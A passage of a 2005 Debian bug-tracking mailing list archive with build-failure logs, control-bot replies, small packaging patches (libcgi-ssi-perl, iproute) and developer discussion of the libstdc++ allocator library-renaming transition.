will run out of registers which leads to this: dsputil_mmx.c -o .libs/dsputil_mmx.o dsputil_mmx.c: In function 'h263_h_loop_filter_mmx': dsputil_mmx.c:586: error: can't find a register in class 'GENERAL_REGS' while reloading 'asm' dsputil_mmx.c:586: error: can't find a register in class 'GENERAL_REGS' while reloading 'asm' make[6]: *** [dsputil_mmx.lo] Error 1 make[6]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src/libffmpeg/libavcodec/i386' make[5]: *** [all-recursive] Error 1 make[5]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src/libffmpeg/libavcodec' make[4]: *** [all-recursive] Error 1 make[4]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src/libffmpeg' make[3]: *** [all-recursive] Error 1 make[3]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/home/arnout/src/xine-lib-1.0.1' make[1]: *** [all] Error 2 make[1]: Leaving directory `/home/arnout/src/xine-lib-1.0.1' make: *** [build-stamp] Error 2 So what exactly did you try to do? -- A: Because it breaks the logical sequence of discussion. Q: Why is top posting bad? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: merge some bugs
Processing commands for [EMAIL PROTECTED]: severity 338469 normal Bug#338469: libatomic-ops_1.0-3(m68k/unstable/vault13): FTBFS on m68k Severity set to `normal'. merge 338469 322027 Bug#322027: libatomic-ops: FTBFS on m68k: Cannot implement AO_compare_and_swap_full on this architecture. Bug#338469: libatomic-ops_1.0-3(m68k/unstable/vault13): FTBFS on m68k Merged 322027 338469. severity 338442 normal Bug#338442: libatomic-ops_1.0-3_mipsel: FTBFS: syntax error before 'AO_locks' Severity set to `normal'. merge 338442 336112 Bug#336112: [mips/mipsel] FTBFS due to missing arch-specific implementation Bug#338442: libatomic-ops_1.0-3_mipsel: FTBFS: syntax error before 'AO_locks' Merged 336112 338442. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339523: libxine1: fails to build
On Wed, Nov 16, 2005 at 11:20:32PM +0100, A.M.P. Boelens wrote: Package: libxine1 Version: 1.0.1-1.3 Severity: serious Justification: no longer builds from source I try to rebuild linxine1 without stripping because it hangs on a certain mp3, but it won't build. I get the following error: Make[6]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src/libffmpeg/libavcodec/armv4l' Making all in i386 make[6]: Entering directory `/home/arnout/src/xine-lib-1.0.1/src/libffmpeg/libavcodec/i386' if /bin/sh ../../../../libtool-nofpic --mode=compile gcc -DHAVE_CONFIG_H -I. -I. -I../../../.. -I../../../.. -I../../../../include -I../../../../include -I../../../../src -I../../../../src/xine-engine -I../../../../src/xine-engine -I../../../../src/xine-utils -I../../../../src/input -I../../../../src/input -I../../../../lib -DSIMPLE_IDCT -DHAVE_AV_CONFIG_H -DRUNTIME_CPUDETECT -DUSE_FASTMEMCPY -DCONFIG_RISKY -DCONFIG_DECODERS -DXINE_MPEG_ENCODER -DCONFIG_ZLIB `echo -mtune=athlon -O3 -pipe -fomit-frame-pointer -falign-functions=4 -falign-loops=4 -falign-jumps=4 -mpreferred-stack-boundary=2 -fexpensive-optimizations -fschedule-insns2 -fno-strict-aliasing -ffast-math -funroll-loops -finline-functions -Wall -DNDEBUG -D_REENTRANT -D_FILE_OFFSET_BITS=64 -DXINE_COMPILE -Wnested-externs -Wcast-align -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -g -O0 | sed -e 's/-funroll-loops//g'` -MT dsputil_mmx.lo -MD -MP -MF .deps/dsputil_mmx.Tpo \ -c -o dsputil_mmx.lo `test -f 'dsputil_mmx.c' || echo './'`dsputil_mmx.c; \ then mv -f .deps/dsputil_mmx.Tpo .deps/dsputil_mmx.Plo; \ else rm -f .deps/dsputil_mmx.Tpo; exit 1; \ fi gcc -DHAVE_CONFIG_H -I. -I. -I../../../.. -I../../../.. -I../../../../include -I../../../../include -I../../../../src -I../../../../src/xine-engine -I../../../../src/xine-engine -I../../../../src/xine-utils -I../../../../src/input -I../../../../src/input -I../../../../lib -DSIMPLE_IDCT -DHAVE_AV_CONFIG_H -DRUNTIME_CPUDETECT -DUSE_FASTMEMCPY -DCONFIG_RISKY -DCONFIG_DECODERS -DXINE_MPEG_ENCODER -DCONFIG_ZLIB -mtune=athlon -O3 -pipe -fomit-frame-pointer -falign-functions=4 -falign-loops=4 -falign-jumps=4 -mpreferred-stack-boundary=2 -fexpensive-optimizations -fschedule-insns2 -fno-strict-aliasing -ffast-math -finline-functions -Wall -DNDEBUG -D_REENTRANT -D_FILE_OFFSET_BITS=64 -DXINE_COMPILE -Wnested-externs -Wcast-align -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -g -O0 -MT dsputil_mmx.lo -MD -MP -MF .deps/dsputil_mmx.Tpo -c dsputil_mmx.c -o .libs/dsputil_mmx.o dsputil_mmx.c: In function 'h263_h_loop_filter_mmx': dsputil_mmx.c:586: error: can't find a register in class 'GENERAL_REGS' while reloading 'asm' dsputil_mmx.c:586: error: can't find a register in class 'GENERAL_REGS' while reloading 'asm' make[6]: *** [dsputil_mmx.lo] Error 1 make[6]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src/libffmpeg/libavcodec/i386' make[5]: *** [all-recursive] Error 1 make[5]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src/libffmpeg/libavcodec' make[4]: *** [all-recursive] Error 1 make[4]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src/libffmpeg' make[3]: *** [all-recursive] Error 1 make[3]: Leaving directory `/home/arnout/src/xine-lib-1.0.1/src' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/home/arnout/src/xine-lib-1.0.1' make[1]: *** [all] Error 2 make[1]: Leaving directory `/home/arnout/src/xine-lib-1.0.1' make: *** [build-stamp] Error 2 This is bug #318838, which was fixed in libxine1 1.0.1-1.1. How are you building this package that you are seeing this failure in a package which has built fine with gcc-4.0 for three versions? . -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#339541: xemacs21-mule: installation fails
Package: xemacs21-mule Version: 21.4.17-1 Severity: grave Justification: renders package unusable Hi, this package doesn't install on a freshly-upgraded-from-woody system. I include a typescript of attempting to configure the package. HTH, Matthew Script started on Thu Nov 17 00:58:52 2005 [EMAIL PROTECTED]:~# dpkg --pending --configure Setting up xemacs21-mule (21.4.17-1) ... emacs-install xemacs21 install/a2ps: Handling install for emacsen flavor xemacs21 Loading /usr/share/emacs/site-lisp/debian-startup... Loading 00debian... Loading site-start... Loading 00debian-vars... Error while loading 20gnus-init Loading 35elib-startup... Loading 40mule-ucs... Loading 50a2ps... Loading a2ps-print... (file a2ps-print.el is newer) Loading 50autoconf... Loading 50bbdb... Loading 50dictionaries-common... Loading /var/cache/dictionaries-common/emacsen-ispell-dicts.el... Loading /var/cache/dictionaries-common/emacsen-ispell-default.el... Loading 50dpkg-dev... Loading 50emacs-goodies-el... Loading 50erc... Loading erc-auto... Loading 50ess... Loading 50gettext... Loading 50gnugo... Loading 50gnuserv... Loading 50mgp... Loading 50octave... Loading 50sawfish... Compiling /usr/share/xemacs21/site-lisp/a2ps/a2ps-print.el... Wrote /usr/share/xemacs21/site-lisp/a2ps/a2ps-print.elc Compiling /usr/share/xemacs21/site-lisp/a2ps/a2ps.el... Wrote /usr/share/xemacs21/site-lisp/a2ps/a2ps.elc Done install/bbdb: Byte-compiling for xemacs21 ... Generating bbdb-autoloads... Byte-compiling bbdb. This takes looong... done. install/dictionaries-common: Byte-compiling for emacsen flavour xemacs21 Compiling /usr/share/xemacs21/site-lisp/dictionaries-common/debian-ispell.el... Wrote /usr/share/xemacs21/site-lisp/dictionaries-common/debian-ispell.elc Compiling /usr/share/xemacs21/site-lisp/dictionaries-common/ispell.el... Wrote /usr/share/xemacs21/site-lisp/dictionaries-common/ispell.elc Done install/elib: Handling install of emacsen flavor xemacs21 xemacs21 -batch -l elib-compile-all.el -f compile-elib Loading /usr/share/emacs/site-lisp/debian-startup... Loading 00debian... Loading site-start... Loading 00debian-vars... Error while loading 20gnus-init Loading 35elib-startup... Loading 40mule-ucs... Loading 50a2ps... Loading a2ps-print... Loading 50autoconf... Loading 50bbdb... Loading 50dictionaries-common... Loading /var/cache/dictionaries-common/emacsen-ispell-dicts.el... Loading /var/cache/dictionaries-common/emacsen-ispell-default.el... Loading 50dpkg-dev... Loading 50emacs-goodies-el... Loading 50erc... Loading erc-auto... Loading 50ess... Loading 50gettext... Loading 50gnugo... Loading 50gnuserv... Loading 50mgp... Loading 50octave... Loading 50sawfish... Byte-compiling stack-f.el... Compiling /usr/share/xemacs21/site-lisp/elib/stack-f.el... Wrote /usr/share/xemacs21/site-lisp/elib/stack-f.elc Byte-compiling stack-m.el... Compiling /usr/share/xemacs21/site-lisp/elib/stack-m.el... Wrote /usr/share/xemacs21/site-lisp/elib/stack-m.elc Byte-compiling queue-f.el... Compiling /usr/share/xemacs21/site-lisp/elib/queue-f.el... Wrote /usr/share/xemacs21/site-lisp/elib/queue-f.elc Byte-compiling queue-m.el... Compiling /usr/share/xemacs21/site-lisp/elib/queue-m.el... Wrote /usr/share/xemacs21/site-lisp/elib/queue-m.elc Byte-compiling elib-node.el... Compiling /usr/share/xemacs21/site-lisp/elib/elib-node.el... Wrote /usr/share/xemacs21/site-lisp/elib/elib-node.elc Byte-compiling dll.el... Compiling /usr/share/xemacs21/site-lisp/elib/dll.el... Wrote /usr/share/xemacs21/site-lisp/elib/dll.elc Byte-compiling dll-debug.el... Compiling /usr/share/xemacs21/site-lisp/elib/dll-debug.el... Wrote /usr/share/xemacs21/site-lisp/elib/dll-debug.elc Byte-compiling bintree.el... Compiling /usr/share/xemacs21/site-lisp/elib/bintree.el... While compiling the end of the data in file /usr/share/xemacs21/site-lisp/elib/bintree.el: ** The following functions are not known to be defined: elib-stack-create, elib-stack-push, elib-stack-pop Wrote /usr/share/xemacs21/site-lisp/elib/bintree.elc Byte-compiling avltree.el... Compiling /usr/share/xemacs21/site-lisp/elib/avltree.el... While compiling elib-avl-enter-balance1 in file /usr/share/xemacs21/site-lisp/elib/avltree.el: ** variable result bound but not referenced While compiling the end of the data: ** The following functions are not known to be defined: elib-stack-create, elib-stack-push, elib-stack-pop Wrote /usr/share/xemacs21/site-lisp/elib/avltree.elc Byte-compiling cookie.el... Compiling /usr/share/xemacs21/site-lisp/elib/cookie.el... Ignoring `eval:' in file's local variables Ignoring `eval:' in file's local variables While compiling elib-refresh-tin in file /usr/share/xemacs21/site-lisp/elib/cookie.el: ** reference to free variable dll While compiling elib-pos-before-middle-p: ** variable dll bound but not referenced While compiling tin-delete: ** variable dll bound but not referenced While compiling tin-locate: ** variable footer bound but not referenced While compiling
Bug#337391: libcgi-ssi-perl: FTBFS: Missing Build-Depends on netbase
Hello all, You need netbase to be installed for /etc/protocols to be available. I can confirm that the package doesn't build correctly when the host is offline, see below. I fixed both of these issues. Please see attached patch. If no objections arise, I'm planning to NMU this. Of course this is not intended as an offence; it's part of my NM-process to fix an RC bug and prepare an NMU for it. regards, Thijs Kinkhorst diff -u libcgi-ssi-perl-0.88/debian/changelog libcgi-ssi-perl-0.88/debian/changelog --- libcgi-ssi-perl-0.88/debian/changelog +++ libcgi-ssi-perl-0.88/debian/changelog @@ -1,3 +1,11 @@ +libcgi-ssi-perl (0.88-1.1) unstable; urgency=high + + * NMU for release critical bug. + * Add netbase to depends (Closes: #337391). + * Skip tests in 'make test' that try to access remote sites. + + -- Thijs Kinkhorst [EMAIL PROTECTED] Thu, 17 Nov 2005 02:54:10 +0100 + libcgi-ssi-perl (0.88-1) unstable; urgency=low * New upstream release. Closes: #329501. diff -u libcgi-ssi-perl-0.88/debian/packages libcgi-ssi-perl-0.88/debian/packages --- libcgi-ssi-perl-0.88/debian/packages +++ libcgi-ssi-perl-0.88/debian/packages @@ -41,6 +41,7 @@ Build-Depends-Indep: libwww-perl Build-Depends-Indep: liburi-perl Build-Depends-Indep: libtimedate-perl +Build-Depends-Indep: netbase %endif Build: sh PERL=${PERL:-/usr/bin/perl} diff -u libcgi-ssi-perl-0.88/debian/control libcgi-ssi-perl-0.88/debian/control --- libcgi-ssi-perl-0.88/debian/control +++ libcgi-ssi-perl-0.88/debian/control @@ -4,7 +4,7 @@ Priority: extra Standards-Version: 3.6.2 Build-Depends: yada (= 0.48) -Build-Depends-Indep: perl (= 5.8), libhtml-simpleparse-perl, perl-modules, libwww-perl, liburi-perl, libtimedate-perl, yada (= 0.48) +Build-Depends-Indep: perl (= 5.8), libhtml-simpleparse-perl, perl-modules, libwww-perl, liburi-perl, libtimedate-perl, netbase, yada (= 0.48) Package: libcgi-ssi-perl Architecture: all --- libcgi-ssi-perl-0.88.orig/test.pl +++ libcgi-ssi-perl-0.88/test.pl @@ -101,10 +101,12 @@ # include file - with many types of input # include virtual - with different types of input -{ -my $ssi = CGI::SSI-new(); -my $html = $ssi-process(q[!--#include virtual=http://www.yahoo.com; --]); -ok($html =~ /yahoo/i $html =~ /mail/i,'include virtual 1'); +SKIP: { +# Thijs Kinkhorst: disable tests that require network access +#my $ssi = CGI::SSI-new(); +#my $html = $ssi-process(q[!--#include virtual=http://www.yahoo.com; --]); +#ok($html =~ /yahoo/i $html =~ /mail/i,'include virtual 1'); +skip(skipping include virtual 1, remote test,1); } # tough to do these well, without more info... @@ -119,10 +121,12 @@ # exec cgi - with different input -{ -my $ssi = CGI::SSI-new(); -my $html = $ssi-process(q[!--#exec cgi=http://www.yahoo.com/; --]); -ok($html =~ /yahoo/i,'exec cgi'); +SKIP: { +# Thijs Kinkhorst: disable tests that require network access +#my $ssi = CGI::SSI-new(); +#my $html = $ssi-process(q[!--#exec cgi=http://www.yahoo.com/; --]); +#ok($html =~ /yahoo/i,'exec cgi'); +skip(skipping exec cgi, remote test,1); } # exec cmd - with different input @@ -267,13 +271,15 @@ # test cookie support SKIP: { - eval use HTTP::Cookies; 1 or skip(HTTP::Cookies not installed, 1); - my $jar = HTTP::Cookies-new({}); - $jar-set_cookie(1,'mycookie','COOKIEVAL','/','www.bitperfect.com',80,0,0,100); - - my $ssi = CGI::SSI-new(COOKIE_JAR = $jar); - my $html = $ssi-process(qq[!--#include virtual=http://www.bitperfect.com/cgi-bin/cgi-ssi/cookietest.cgi--]); - ok($html =~ m'COOKIEVAL', cookie support); +# Thijs Kinkhorst: disable tests that require network access +# eval use HTTP::Cookies; 1 or skip(HTTP::Cookies not installed, 1); +# my $jar = HTTP::Cookies-new({}); +# $jar-set_cookie(1,'mycookie','COOKIEVAL','/','www.bitperfect.com',80,0,0,100); +# +# my $ssi = CGI::SSI-new(COOKIE_JAR = $jar); +# my $html = $ssi-process(qq[!--#include virtual=http://www.bitperfect.com/cgi-bin/cgi-ssi/cookietest.cgi--]); +# ok($html =~ m'COOKIEVAL', cookie support); + skip(skipping cookie test, remote test, 1); } SKIP: { signature.asc Description: This is a digitally signed message part
Processed: raise severity of bug reports filed for libstdc++ allocator changes
Processing commands for [EMAIL PROTECTED]: severity 339142 serious Bug#339142: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339143 serious Bug#339143: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339144 serious Bug#339144: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339145 serious Bug#339145: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339146 serious Bug#339146: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339147 serious Bug#339147: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339148 serious Bug#339148: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339149 serious Bug#339149: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339150 serious Bug#339150: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339151 serious Bug#339151: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339152 serious Bug#339152: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339153 serious Bug#339153: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339154 serious Bug#339154: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339155 serious Bug#339155: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339156 serious Bug#339156: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339157 serious Bug#339157: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339158 serious Bug#339158: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339159 serious Bug#339159: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339160 serious Bug#339160: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339161 serious Bug#339161: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339162 serious Bug#339162: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339163 serious Bug#339163: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339164 serious Bug#339164: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339165 serious Bug#339165: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339166 serious Bug#339166: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339167 serious Bug#339167: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339168 serious Bug#339168: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339169 serious Bug#339169: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339170 serious Bug#339170: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339171 serious Bug#339171: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339172 serious Bug#339172: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339173 serious Bug#339173: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339174 serious Bug#339174: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339175 serious Bug#339175: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339176 serious Bug#339176: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339177 serious Bug#339177: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339178 serious Bug#339178: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity 339179 serious Bug#339179: library package needs to be renamed (libstdc++ allocator change) Severity set to `serious'. severity
Processed: tagging 337391
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.9.8 tags 337391 + patch Bug#337391: libcgi-ssi-perl: FTBFS: Missing Build-Depends on netbase There were no tags set. Tags added: patch End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339255: library package needs to be renamed (libstdc++ allocator change)
Doko, On 17 November 2005 at 03:22, Matthias Klose wrote: | Compiler versions g++-4.0_4.0.2-4 and g++-3.4_3.4.4-10 are now in the | archive. The renaming of the library packages can now start. You can | upload the packages even before the toolchain is built for all architectures | because the packages with the new binary packages will be hold in the NEW | queue until the required toolchain changes are installed on the buildd's. I am getting this because of Quantlib. Now, for libquantlib-0.3.11, the most recent version, as well as for the preceding ones: [EMAIL PROTECTED]:~ apt-cache rdepends libquantlib-0.3.11 libquantlib-0.3.11 Reverse Depends: r-cran-rquantlib quantlib-ruby quantlib-python quantlib-examples quantlib-examples libquantlib0-dev libquantlib0-dev Do I really need to do the c2a renaming dance? I upload a new Quantlib, and a day later rebuild my two packages that depend on ? [ quantlib-swig provides quantlib-ruby and quantlib-python; rquantlib provides r-cran-rquantlib; quantlib-examples comes fromq quantlib itself. ] This small set makes Quantlib a little easier to deal with than a full blown KDE component or base library. So shall we do this without c2a ? Dirk -- Statistics: The (futile) attempt to offer certainty about uncertainty. -- Roger Koenker, 'Dictionary of Received Ideas of Statistics' -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339541: xemacs21-mule: installation fails
Hi. From: Matthew Vernon [EMAIL PROTECTED] Subject: Bug#339541: xemacs21-mule: installation fails Date: Thu, 17 Nov 2005 01:04:05 + this package doesn't install on a freshly-upgraded-from-woody system. I include a typescript of attempting to configure the package. install/gnus: Byte-compiling for xemacs21...found xemacs21 .. Creating config file /etc/xemacs21/site-start.d/20gnus-init.el with new version emacs-install: /usr/lib/emacsen-common/packages/install/gnus xemacs21 emacs20 emacs21 failed at /usr/lib/emacsen-common/emacs-install line 28, TSORT line 15. dpkg: error processing xemacs21-mule (--configure): subprocess post-installation script returned error exit status 1 Errors were encountered while processing: xemacs21-mule [EMAIL PROTECTED]:~# Script done on Thu Nov 17 01:00:41 2005 The error occurs when installing gnus. What version of gnus do you use? There is no problem in my sarge box. Thanks. OHURA Makoto: [EMAIL PROTECTED](Debian Project) [EMAIL PROTECTED](LILO/Netfort) GnuPG public key: http://www.netfort.gr.jp/~ohura/gpg.asc.txt 1024D/77DCE083 fingerprint: 54F6 D1B1 2EE1 81CD 65E3 A1D3 EEA2 EFA2 77DC E083 http://www.netfort.gr.jp/~ohura/ pgpLYMOsqRn8t.pgp Description: PGP signature
Bug#339275: library package needs to be renamed (libstdc++ allocator change)
Matthias Klose [EMAIL PROTECTED] wrote: Compiler versions g++-4.0_4.0.2-4 and g++-3.4_3.4.4-10 are now in the archive. The renaming of the library packages can now start. You can upload the packages even before the toolchain is built for all architectures because the packages with the new binary packages will be hold in the NEW queue until the required toolchain changes are installed on the buildd's. For anyone monitoring this bug, I'm going to hold off on my upload until Friday when an unrelated fix from upstream is coming out. That will save having to do two uploads. Otherwise, my renamed package is prepared. -- Jay Berkenbilt [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339255: library package needs to be renamed (libstdc++ allocator change)
severity 339255 important thanks On Wed, Nov 16, 2005 at 09:16:37PM -0600, Dirk Eddelbuettel wrote: On 17 November 2005 at 03:22, Matthias Klose wrote: | Compiler versions g++-4.0_4.0.2-4 and g++-3.4_3.4.4-10 are now in the | archive. The renaming of the library packages can now start. You can | upload the packages even before the toolchain is built for all architectures | because the packages with the new binary packages will be hold in the NEW | queue until the required toolchain changes are installed on the buildd's. I am getting this because of Quantlib. Now, for libquantlib-0.3.11, the most recent version, as well as for the preceding ones: [EMAIL PROTECTED]:~ apt-cache rdepends libquantlib-0.3.11 libquantlib-0.3.11 Reverse Depends: r-cran-rquantlib quantlib-ruby quantlib-python quantlib-examples quantlib-examples libquantlib0-dev libquantlib0-dev Do I really need to do the c2a renaming dance? I upload a new Quantlib, and a day later rebuild my two packages that depend on ? [ quantlib-swig provides quantlib-ruby and quantlib-python; rquantlib provides r-cran-rquantlib; quantlib-examples comes fromq quantlib itself. ] Do you *need* to? Technically, since this library soname has been confined to unstable and presumably has not been used elsewhere as a .deb under this name, it's not an RC bug if the ABI changes without a change in package name. It's still a bug, of a sort I believe we should take seriously; but it won't prevent quantlib from shipping with etch... This small set makes Quantlib a little easier to deal with than a full blown KDE component or base library. So shall we do this without c2a ? No, the size of the reverse-dependency tree is not a factor in whether the bug should be treated as release-critical. If a package is presenting a shared library interface, this must be done responsibly so that *however* many packages there are depending on it, they don't break sa a result of partial upgrades. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Processed: Re: Bug#339255: library package needs to be renamed (libstdc++ allocator change)
Processing commands for [EMAIL PROTECTED]: severity 339255 important Bug#339255: library package needs to be renamed (libstdc++ allocator change) Severity set to `important'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#326961: acknowledged by developer (Bug#326961: fixed in iproute 20041019-4)
reopen 326961 -- You need the 2nd half of the patch (found in my reply to the original bug report, as well as below...) thanks, lamont diff -urNad iproute-20041019/tc/paretonormal.c /tmp/dpep.9YHbob/iproute-20041019/tc/paretonormal.c --- iproute-20041019/tc/paretonormal.c 2004-10-19 14:49:02.0 -0600 +++ /tmp/dpep.9YHbob/iproute-20041019/tc/paretonormal.c 2005-09-06 15:49:01.0 -0600 @@ -54,7 +54,7 @@ double *table; int i,n; - table = calloc(TABLESIZE, sizeof(double)); + table = calloc(TABLESIZE+1, sizeof(double)); if (!table) { fprintf(stderr, Out of memory!\n); exit(1); -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#326961 acknowledged by developer (Bug#326961: fixed in iproute 20041019-4)
Processing commands for [EMAIL PROTECTED]: reopen 326961 Bug#326961: FTBFS: normal.c heap corrution due to table overflow Bug reopened, originator not changed. -- Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339290: marked as done (flashplugin-nonfree: Version 7,0,61,0 released to fix CVE-2005-2628)
Your message dated Thu, 17 Nov 2005 15:42:56 +0900 with message-id [EMAIL PROTECTED] and subject line Bug#339290: flashplugin-nonfree: Version 7,0,61,0 released to fix CVE-2005-2628 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 15 Nov 2005 08:10:35 + From [EMAIL PROTECTED] Tue Nov 15 00:10:35 2005 Return-path: [EMAIL PROTECTED] Received: from 1-1-4-25a.lio.sth.bostream.se ([82.182.83.86] helo=localhost.localdomain) by spohr.debian.org with esmtp (Exim 4.50) id 1Ebvti-0004ja-Oi for [EMAIL PROTECTED]; Tue, 15 Nov 2005 00:10:35 -0800 Received: by localhost.localdomain (Postfix, from userid 1000) id 9602F306B6; Tue, 15 Nov 2005 09:10:32 +0100 (CET) Content-Type: text/plain; charset=us-ascii MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: =?utf-8?q?H=C3=A5kan_Lindqvist?= [EMAIL PROTECTED] To: Debian Bug Tracking System [EMAIL PROTECTED] Subject: flashplugin-nonfree: Version 7,0,61,0 released to fix CVE-2005-2628 X-Mailer: reportbug 3.17 Date: Tue, 15 Nov 2005 09:10:32 +0100 X-Debbugs-Cc: Debian Security Team [EMAIL PROTECTED] Message-Id: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-11.0 required=4.0 tests=BAYES_00,HAS_PACKAGE, X_DEBBUGS_CC autolearn=ham version=2.60-bugs.debian.org_2005_01_02 Package: flashplugin-nonfree Version: 7.0.25-5 Severity: grave Tags: security Justification: user security hole Macromedia has released version 7,0,61,0 to fix CVE-2005-2628 (buffer overflow). -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12-1-686 Locale: LANG=en_US.UTF-8, LC_CTYPE=sv_SE.UTF-8 (charmap=UTF-8) Versions of packages flashplugin-nonfree depends on: ii debconf 1.4.59 Debian configuration management sy ii libruby 1.8.2-1Libraries necessary to run Ruby 1. ii ruby 1.8.2-1An interpreter of object-oriented Versions of packages flashplugin-nonfree recommends: pn gsfonts-x11 none (no description available) pn libstdc++2.10-glibc2.2none (no description available) -- debconf information excluded --- Received: (at 339290-close) by bugs.debian.org; 17 Nov 2005 06:42:56 + From [EMAIL PROTECTED] Wed Nov 16 22:42:56 2005 Return-path: [EMAIL PROTECTED] Received: from fourier.airs.net ([210.150.176.206] helo=fourier.northeye.org) by spohr.debian.org with esmtp (Exim 4.50) id 1EcdTz-0006AE-Rj for [EMAIL PROTECTED]; Wed, 16 Nov 2005 22:42:56 -0800 Received: from [192.168.254.200] (unknown [192.168.254.200]) by fourier.northeye.org (FlexMail(Postfix)) with ESMTP id CF94179C0F8; Thu, 17 Nov 2005 15:42:53 +0900 (JST) Subject: Re: Bug#339290: flashplugin-nonfree: Version 7,0,61,0 released to fix CVE-2005-2628 From: Takuo KITAME [EMAIL PROTECTED] To: =?ISO-8859-1?Q?H=E5kan?= Lindqvist [EMAIL PROTECTED], [EMAIL PROTECTED] In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Content-Type: text/plain; charset=UTF-8 Organization: Debian Project Date: Thu, 17 Nov 2005 15:42:56 +0900 Message-Id: [EMAIL PROTECTED] Mime-Version: 1.0 X-Mailer: Evolution 2.4.1 Content-Transfer-Encoding: quoted-printable X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: 